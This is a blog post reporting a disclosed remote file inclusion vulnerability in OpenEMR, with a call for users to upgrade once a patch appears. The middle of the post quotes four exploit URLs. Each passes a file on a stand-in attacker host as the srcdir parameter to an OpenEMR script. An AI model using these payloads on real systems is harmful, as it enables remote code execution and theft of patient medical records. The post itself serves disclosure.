An Indonesean Hacker named Dedi Dwianto has just publicized a Vulnerability in OpenEMR. This is a significant milestone for the project. This means that OpenEMR is popular enough for a security researcher to take notice. Open Source has the potential to be more secure, but only if security researchers look for flaws and then the projects respond by fixing the code. (I wish I had hackers studying my code…) I am sure that the OpenEMR folks will be releasing a patch soon. If you are an OpenEMR user, you should upgrade to the soon-to-be-released version ASAP. Read more for a description of the vulnerability…
Apparently, there are several places in OpenEMR where there is an unchecked GET parameter passed in. So OpenEMR is expecting a value on the local filesystem, however, you can pass in a URL for unexpected results. From the exploit…
http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?
The security researcher suggests turning off register_globals and checking for sanity in srcdir, but as I recall, OpenEMR does not use register_globals. We will have to wait for comment/patch from OpenEMR to see what the fix is.